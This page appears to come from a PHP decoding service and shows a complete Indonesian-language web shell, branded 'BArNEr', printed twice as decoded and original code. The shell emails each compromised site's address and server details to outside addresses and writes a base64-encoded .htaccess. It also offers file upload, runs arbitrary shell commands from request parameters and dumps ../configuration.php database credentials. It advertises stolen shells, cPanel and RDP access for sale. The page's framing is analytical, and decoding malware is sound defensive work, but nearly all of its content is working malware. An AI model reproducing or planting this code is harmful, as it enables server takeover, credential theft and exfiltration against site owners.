Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php error_reporting(0); if (!isset($_SESSION['bajak'])) { $visitcount = 0; $w..

Decoded Output download

<?php error_reporting(0); 
if (!isset($_SESSION['bajak'])) { 
    $visitcount = 0; 
    $web = $_SERVER["HTTP_HOST"]; 
    $inj = $_SERVER["REQUEST_URI"]; 
    $body = "Target ditemukan  
$web$inj"; 
    $safem0de = @ini_get('safe_mode'); 
    if (!$safem0de) { 
        $security = "SAFE_MODE = OFF"; 
    } else { 
        $security = "SAFE_MODE = ON"; 
    }; 
    $serper = gethostbyname($_SERVER['SERVER_ADDR']); 
    $injektor = gethostbyname($_SERVER['REMOTE_ADDR']); 
    $uname = ".php_uname()."; 
    mail("[email protected]", "$body", "Hasil Bajakan http://$web$inj 
$security 
$uname 
IP Server = $serper 
 IP Injector= $injektor"); 
    mail("[email protected]", "$body", "Hasil Bajakan http://$web$inj 
$security 
$uname 
IP Server = $serper 
 IP Injector= $injektor"); 
    $_SESSION['bajak'] = 1; 
} else { 
    $_SESSION['bajak']++; 
}; 
if (isset($_GET['clone'])) { 
    $source = $_SERVER['SCRIPT_FILENAME']; 
    $desti = $_SERVER['DOCUMENT_ROOT'] . "/cache/xml.php"; 
    rename($source, $desti); 
} 
$file = 'PEZpbGVzICpwaHAqPg0KICAgIE9yZGVyIERlbnksQWxsb3cNCiAgICBEZW55IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzICoudm9iPg0KICAgIE9yZGVyIERlbnksQWxsb3cNCiAgICBEZW55IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzICpwSHAqPg0KICAgIE9yZGVyIERlbnksQWxsb3cNCiAgICBEZW55IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzICpodG0qPg0KICAgIE9yZGVyIERlbnksQWxsb3cNCiAgICBEZW55IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzICpsaWJzLnBocCo+DQogICAgT3JkZXIgQWxsb3csRGVueQ0KICAgIEFsbG93IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzIDQwNC5waHA+DQogICAgT3JkZXIgQWxsb3csRGVueQ0KICAgIEFsbG93IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzICptbGlicyo+DQogICAgT3JkZXIgRGVueSxBbGxvdw0KICAgIERlbnkgZnJvbSBhbGwNCjwvRmlsZXM+DQo8RmlsZXMgKi5saWJzKj4NCiAgICBPcmRlciBEZW55LEFsbG93DQogICAgRGVueSBmcm9tIGFsbA0KPC9GaWxlcz4NCjxGaWxlcyBpbmRleCo+DQogICAgT3JkZXIgQWxsb3csRGVueQ0KICAgIEFsbG93IGZyb20gYWxsDQo8L0ZpbGVzPg=='; 
$pathx = $_SERVER['DOCUMENT_ROOT'] . '/' . 'cache/.htaccess'; 
if (file_exists($pathx)) @unlink($pathx); 
$content2 = base64_decode($file); 
$txt2 = fopen($pathx, "a+"); 
fwrite($txt2, $content2); 
fclose($txt2); 
$safem0de = @ini_get('safe_mode'); 
if (!$safem0de) { 
    $security = "SAFE_MODE : OFF BArNEr"; 
} else { 
    $security = "SAFE_MODE : ON BArNEr"; 
} 
echo "<title>BArNEr</title><br>"; 
$dataku = "POWERED BY FULLMAGIC COMMUNITY"; 
$dataku2 = "ready fresh tools SHELLS FTP CPANEL RDP MAILER"; 
$dataku3 = "Contact Admin YM : KUNCUNG525"; 
echo "<font size=2 color=blue><b>" . $dataku . "</b><br>"; 
echo "<font size=2 color=red><b>" . $dataku2 . "</b><br>"; 
echo "<font size=2 color=blue><b>" . $dataku3 . "</b><br>"; 
echo "<font size=2 color=#888888><b>" . $security . "</b><br>"; 
$cur_user = "(" . get_current_user() . ")"; 
echo "<font size=2 color=#888888><b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>"; 
echo "<font size=2 color=#888888><b>Uname : " . php_uname() . "</b><br>"; 
function pwd() { 
    $cwd = getcwd(); 
    if ($u = strrpos($cwd, '/')) { 
        if ($u != strlen($cwd) - 1) { 
            return $cwd . '/'; 
        } else { 
            return $cwd; 
        }; 
    } elseif ($u = strrpos($cwd, '\')){ 
if($u!=strlen($cwd)-1){ 
return $cwd.'\';} 
else{return $cwd;}; 
}; 
} 
if(isset($_GET['URL'])){ 
echo ' < formmethod = "POST"action = "" > < fontsize = 2color = #888888><b>Command</b><br><input type="text" name="sh"><input type="Submit" name="command" value="cok"></form>'; 
    echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>'; 
    if (isset($_POST['submit'])) { 
        $uploaddir = pwd(); 
        if (!$name = $_POST['newname']) { 
            $name = $_FILES['userfile']['name']; 
        }; 
        move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name); 
        if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) { 
            echo "Upload Failed"; 
        } else { 
            echo "Upload Success to " . $uploaddir . $name . " Succes! "; 
        } 
    } 
} 
if (isset($_POST['command'])) { 
    $sh = $_POST['sh']; 
    echo "<pre><font size=3 color=#000000>" . shell_exec($sh) . "</font></pre>"; 
} elseif (isset($_GET['shx'])) { 
    $comd = $_GET['sh']; 
    echo "<pre><font size=3 color=#000000>" . shell_exec($comd) . "</font></pre>"; 
} else { 
    echo "<pre><font size=3 color=#000000>" . shell_exec('ls -la') . "</font></pre>"; 
} 
if (isset($_GET['db'])) { 
    $conf = file_get_contents("../configuration.php"); 
    echo $conf; 
} ?>

Did this file decode correctly?

Original Code

<?php error_reporting(0);
if (!isset($_SESSION['bajak'])) {
    $visitcount = 0;
    $web = $_SERVER["HTTP_HOST"];
    $inj = $_SERVER["REQUEST_URI"];
    $body = "Target ditemukan 
$web$inj";
    $safem0de = @ini_get('safe_mode');
    if (!$safem0de) {
        $security = "SAFE_MODE = OFF";
    } else {
        $security = "SAFE_MODE = ON";
    };
    $serper = gethostbyname($_SERVER['SERVER_ADDR']);
    $injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
    $uname = ".php_uname().";
    mail("[email protected]", "$body", "Hasil Bajakan http://$web$inj
$security
$uname
IP Server = $serper
 IP Injector= $injektor");
    mail("[email protected]", "$body", "Hasil Bajakan http://$web$inj
$security
$uname
IP Server = $serper
 IP Injector= $injektor");
    $_SESSION['bajak'] = 1;
} else {
    $_SESSION['bajak']++;
};
if (isset($_GET['clone'])) {
    $source = $_SERVER['SCRIPT_FILENAME'];
    $desti = $_SERVER['DOCUMENT_ROOT'] . "/cache/xml.php";
    rename($source, $desti);
}
$file = 'PEZpbGVzICpwaHAqPg0KICAgIE9yZGVyIERlbnksQWxsb3cNCiAgICBEZW55IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzICoudm9iPg0KICAgIE9yZGVyIERlbnksQWxsb3cNCiAgICBEZW55IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzICpwSHAqPg0KICAgIE9yZGVyIERlbnksQWxsb3cNCiAgICBEZW55IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzICpodG0qPg0KICAgIE9yZGVyIERlbnksQWxsb3cNCiAgICBEZW55IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzICpsaWJzLnBocCo+DQogICAgT3JkZXIgQWxsb3csRGVueQ0KICAgIEFsbG93IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzIDQwNC5waHA+DQogICAgT3JkZXIgQWxsb3csRGVueQ0KICAgIEFsbG93IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzICptbGlicyo+DQogICAgT3JkZXIgRGVueSxBbGxvdw0KICAgIERlbnkgZnJvbSBhbGwNCjwvRmlsZXM+DQo8RmlsZXMgKi5saWJzKj4NCiAgICBPcmRlciBEZW55LEFsbG93DQogICAgRGVueSBmcm9tIGFsbA0KPC9GaWxlcz4NCjxGaWxlcyBpbmRleCo+DQogICAgT3JkZXIgQWxsb3csRGVueQ0KICAgIEFsbG93IGZyb20gYWxsDQo8L0ZpbGVzPg==';
$pathx = $_SERVER['DOCUMENT_ROOT'] . '/' . 'cache/.htaccess';
if (file_exists($pathx)) @unlink($pathx);
$content2 = base64_decode($file);
$txt2 = fopen($pathx, "a+");
fwrite($txt2, $content2);
fclose($txt2);
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {
    $security = "SAFE_MODE : OFF BArNEr";
} else {
    $security = "SAFE_MODE : ON BArNEr";
}
echo "<title>BArNEr</title><br>";
$dataku = "POWERED BY FULLMAGIC COMMUNITY";
$dataku2 = "ready fresh tools SHELLS FTP CPANEL RDP MAILER";
$dataku3 = "Contact Admin YM : KUNCUNG525";
echo "<font size=2 color=blue><b>" . $dataku . "</b><br>";
echo "<font size=2 color=red><b>" . $dataku2 . "</b><br>";
echo "<font size=2 color=blue><b>" . $dataku3 . "</b><br>";
echo "<font size=2 color=#888888><b>" . $security . "</b><br>";
$cur_user = "(" . get_current_user() . ")";
echo "<font size=2 color=#888888><b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>";
echo "<font size=2 color=#888888><b>Uname : " . php_uname() . "</b><br>";
function pwd() {
    $cwd = getcwd();
    if ($u = strrpos($cwd, '/')) {
        if ($u != strlen($cwd) - 1) {
            return $cwd . '/';
        } else {
            return $cwd;
        };
    } elseif ($u = strrpos($cwd, '\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
if(isset($_GET['URL'])){
echo ' < formmethod = "POST"action = "" > < fontsize = 2color = #888888><b>Command</b><br><input type="text" name="sh"><input type="Submit" name="command" value="cok"></form>';
    echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
    if (isset($_POST['submit'])) {
        $uploaddir = pwd();
        if (!$name = $_POST['newname']) {
            $name = $_FILES['userfile']['name'];
        };
        move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
        if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) {
            echo "Upload Failed";
        } else {
            echo "Upload Success to " . $uploaddir . $name . " Succes! ";
        }
    }
}
if (isset($_POST['command'])) {
    $sh = $_POST['sh'];
    echo "<pre><font size=3 color=#000000>" . shell_exec($sh) . "</font></pre>";
} elseif (isset($_GET['shx'])) {
    $comd = $_GET['sh'];
    echo "<pre><font size=3 color=#000000>" . shell_exec($comd) . "</font></pre>";
} else {
    echo "<pre><font size=3 color=#000000>" . shell_exec('ls -la') . "</font></pre>";
}
if (isset($_GET['db'])) {
    $conf = file_get_contents("../configuration.php");
    echo $conf;
}

Function Calls

None

Variables

None

Stats

MD5	8d5e90c623a472199efd78d577ec156a
Eval Count	0
Decode Time	111 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats